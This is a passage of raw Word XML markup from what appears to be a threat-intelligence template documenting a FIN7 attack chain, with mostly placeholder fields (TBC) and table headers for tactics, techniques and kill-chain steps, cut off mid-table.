            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78F2C067" w14:textId="77777777" w:rsidR="005369E4" w:rsidRDefault="005369E4" w:rsidP="00BD10BB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Vulnerabilities Exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13CC1639" w14:textId="4BBF99EC" w:rsidR="005369E4" w:rsidRDefault="00A337A0" w:rsidP="00BD10BB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="177D4447" w14:textId="77777777" w:rsidR="005369E4" w:rsidRDefault="005369E4" w:rsidP="00BD10BB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005369E4" w:rsidRPr="00B857D7" w14:paraId="76956A69" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="145D2CF9" w14:textId="77777777" w:rsidR="005369E4" w:rsidRDefault="005369E4" w:rsidP="00BD10BB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Related Attack Patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5592F66A" w14:textId="40100155" w:rsidR="005369E4" w:rsidRDefault="00A337A0" w:rsidP="00BD10BB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="020435ED" w14:textId="2EE83B2C" w:rsidR="005369E4" w:rsidRDefault="005369E4" w:rsidP="00BD10BB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00873778" w:rsidRPr="00B857D7" w14:paraId="45DE36EC" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E9CAD16" w14:textId="77777777" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Preceded By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BA8F6BD" w14:textId="511E0678" w:rsidR="00873778" w:rsidRDefault="004F28B4" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C0E9105"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124BCA3D" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78EDC7DC" w14:textId="77777777" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Schema Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="551931BD" w14:textId="77777777" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42961260" w14:textId="77777777" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>To allow for future new chain models</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005369E4" w:rsidRPr="00B857D7" w14:paraId="1170DF68" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D202985" w14:textId="264C6E06" w:rsidR="005369E4" w:rsidRDefault="00873778" w:rsidP="00BD10BB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35E5A8F6" w14:textId="144DD054" w:rsidR="005369E4" w:rsidRDefault="00947362" w:rsidP="00BD10BB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2017</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="468FB072" w14:textId="751D4A57" w:rsidR="005369E4" w:rsidRDefault="00947362" w:rsidP="00BD10BB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00947362">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>On April 12, in response to FIN7 actively targeting multiple clients</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="32375207" w14:textId="77777777" w:rsidR="005369E4" w:rsidRPr="00AC7A85" w:rsidRDefault="005369E4" w:rsidP="005369E4"/>
    <w:p w14:paraId="0F52A7B2" w14:textId="77777777" w:rsidR="005369E4" w:rsidRDefault="005369E4" w:rsidP="005369E4">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:t>Attack Technique Chain (Initial Access)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="10456" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="440"/>
        <w:gridCol w:w="1260"/>
        <w:gridCol w:w="2333"/>
        <w:gridCol w:w="635"/>
        <w:gridCol w:w="591"/>
        <w:gridCol w:w="555"/>
        <w:gridCol w:w="1010"/>
        <w:gridCol w:w="3632"/>
      </w:tblGrid>
      <w:tr w:rsidR="006D3412" w:rsidRPr="002D1D50" w14:paraId="09F9AFF1" w14:textId="77777777" w:rsidTr="00794624">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="70F80046" w14:textId="77777777" w:rsidR="004F28B4" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="106" w:name="OLE_LINK17"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="752F6880" w14:textId="77777777" w:rsidR="004F28B4" w:rsidRPr="002D1D50" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2333" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="36C8E612" w14:textId="41C54BA0" w:rsidR="004F28B4" w:rsidRPr="002D1D50" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>FIN7_001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="542F05D9" w14:textId="77777777" w:rsidR="004F28B4" w:rsidRPr="002D1D50" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="47CAFF4A" w14:textId="1AA82E78" w:rsidR="004F28B4" w:rsidRPr="002D1D50" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Ver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="522949F9" w14:textId="7FFDC6E5" w:rsidR="004F28B4" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2B003059" w14:textId="28C5582B" w:rsidR="004F28B4" w:rsidRPr="002D1D50" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="414B89FE" w14:textId="77777777" w:rsidR="004F28B4" w:rsidRPr="002D1D50" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D3412" w:rsidRPr="002D1D50" w14:paraId="1734A62F" w14:textId="77777777" w:rsidTr="00794624">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4ADF5BC9" w14:textId="77777777" w:rsidR="004F28B4" w:rsidRPr="002D1D50" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75D10070" w14:textId="77777777" w:rsidR="004F28B4" w:rsidRPr="002D1D50" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2333" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E0AC165" w14:textId="77777777" w:rsidR="004F28B4" w:rsidRPr="002D1D50" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DAA3182" w14:textId="77777777" w:rsidR="004F28B4" w:rsidRPr="002D1D50" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A795542" w14:textId="77777777" w:rsidR="004F28B4" w:rsidRPr="002D1D50" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3ACD3F2A" w14:textId="77777777" w:rsidR="004F28B4" w:rsidRPr="002D1D50" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="753A1EC4" w14:textId="56E2185B" w:rsidR="004F28B4" w:rsidRPr="002D1D50" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51BB3D8A" w14:textId="77777777" w:rsidR="004F28B4" w:rsidRPr="002D1D50" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D3412" w:rsidRPr="002D1D50" w14:paraId="289403A6" w14:textId="77777777" w:rsidTr="00794624">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59D824C0" w14:textId="77777777" w:rsidR="004F28B4" w:rsidRPr="002D1D50" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5406C51F" w14:textId="77777777" w:rsidR="004F28B4" w:rsidRPr="002D1D50" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2333" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22C51B44" w14:textId="77777777" w:rsidR="004F28B4" w:rsidRPr="002D1D50" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EB3D3D8" w14:textId="77777777" w:rsidR="004F28B4" w:rsidRPr="002D1D50" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Pred</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="714ACC9C" w14:textId="3C96F6FC" w:rsidR="004F28B4" w:rsidRPr="002D1D50" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>TInc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DFE09D7" w14:textId="45C43B33" w:rsidR="004F28B4" w:rsidRPr="002D1D50" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>S/G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53D304FF" w14:textId="72EBE005" w:rsidR="004F28B4" w:rsidRPr="002D1D50" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>KC Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61738A78" w14:textId="77777777" w:rsidR="004F28B4" w:rsidRPr="002D1D50" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D3412" w:rsidRPr="00B857D7" w14:paraId="127C8F13" w14:textId="77777777" w:rsidTr="00794624">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="515CB9EA" w14:textId="77777777" w:rsidR="00EC403C" w:rsidRPr="00B857D7" w:rsidRDefault="00EC403C" w:rsidP="00EC403C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D553234" w14:textId="77777777" w:rsidR="00EC403C" w:rsidRPr="00B857D7" w:rsidRDefault="00EC403C" w:rsidP="00EC403C">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333" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7873D9D1" w14:textId="77777777" w:rsidR="00EC403C" w:rsidRPr="00B857D7" w:rsidRDefault="00EC403C" w:rsidP="00EC403C">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35" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F781A8B" w14:textId="2AC87AA7" w:rsidR="00EC403C" w:rsidRPr="00B857D7" w:rsidRDefault="00EC403C" w:rsidP="00EC403C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="255CA60D" w14:textId="77777777" w:rsidR="00EC403C" w:rsidRPr="00B857D7" w:rsidRDefault="00EC403C" w:rsidP="00EC403C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70278080" w14:textId="141FDEAF" w:rsidR="00EC403C" w:rsidRPr="00B857D7" w:rsidRDefault="00EC403C" w:rsidP="00EC403C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D9F0477" w14:textId="4044351E" w:rsidR="00EC403C" w:rsidRPr="00B857D7" w:rsidRDefault="00EC403C" w:rsidP="00EC403C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEL/IF-SEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
          </w:tcPr>
